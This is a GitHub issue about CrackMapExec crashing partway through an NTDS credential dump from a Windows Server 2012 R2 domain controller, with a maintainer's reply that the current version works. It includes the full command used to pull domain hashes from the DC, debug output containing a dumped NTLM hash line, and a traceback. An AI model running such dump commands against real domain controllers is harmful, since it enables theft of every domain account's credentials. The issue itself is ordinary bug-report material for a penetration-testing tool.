### ISSUE TITLE
Getting error when trying to do NTDS dump

### ISSUE THREAD

**Issue by maxpaynejeju** [byt3bl33d3r/CrackMapExec#319]
## Steps to reproduce

1. ... Ran the command against DC. After dumping few hashes, it throws this error message
2. ...

## Command string used
crackmapexec -u username -p 'P@ssword' -d COMPANYDOMAIN 192.168.1.5 --ntds vss

## CME verbose output (using the --verbose flag)
DEBUG                                          Trying to fetch page 4025 (0x1f74000)
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Trying to fetch page 4026 (0x1f76000)
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Decrypting hash for user: ABCD
CME          192.168.1.5:445 ABCD02        companydomain.com\abcd:2408:aad3b435b51404eeaad3b435b51404ee:4424147a7dab3c47c4bb3921443023bd:::
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Multivalue detected in column ATTc0, returning raw results
DEBUG                                          Cleaning up... 
DEBUG                                          Stopping service RemoteRegistry
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 716, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python2.7/dist-packages/cme/connection.py", line 173, in __init__
    getattr(self, k)()
  File "/usr/lib/python2.7/dist-packages/cme/connection.py", line 39, in _decorator
    return func(self, *args, **kwargs)
  File "/usr/lib/python2.7/dist-packages/cme/connection.py", line 507, in ntds
    DumpSecrets(self).NTDS_dump(self.args.ntds, self.args.ntds_pwdLastSet, self.args.ntds_history)
  File "/usr/lib/python2.7/dist-packages/cme/credentials/secretsdump.py", line 156, in NTDS_dump
    self.cleanup()
  File "/usr/lib/python2.7/dist-packages/cme/credentials/secretsdump.py", line 161, in cleanup
    self.__remoteOps.finish()
  File "/usr/lib/python2.7/dist-packages/cme/remoteoperations.py", line 328, in finish
    self.__restore()
  File "/usr/lib/python2.7/dist-packages/cme/remoteoperations.py", line 292, in __restore
    scmr.hRControlService(self.__scmr, self.__serviceHandle, scmr.SERVICE_CONTROL_STOP)
  File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/scmr.py", line 1164, in hRControlService
    return dce.request(request)
  File "/usr/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 858, in request
    raise exception
DCERPCSessionError: SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
2019-10-08T06:51:00Z <Greenlet "Greenlet-0" at 0x7f25f54dfaf0: Connection(Namespace(content=False, cred_id=[], depth=10, dis, <cme.database.CMEDatabase instance at 0x7f25f54bad, '192.168.1.5', None, None)> failed with DCERPCSessionError
## CME Version (cme --version)
root@kali:~# crackmapexec -v
3.1.5 - 'Smidge'
## OS
Kali Linux 2019
## Target OS
Windows 6.3 Build 9600 (Windows Server 2012 R2)

## Detailed issue explanation
See above

**Comment by mpgn** [comment]
Just tested on latest version (5.x), working fine. Feel free to reopen with you still have the error with v5 :)
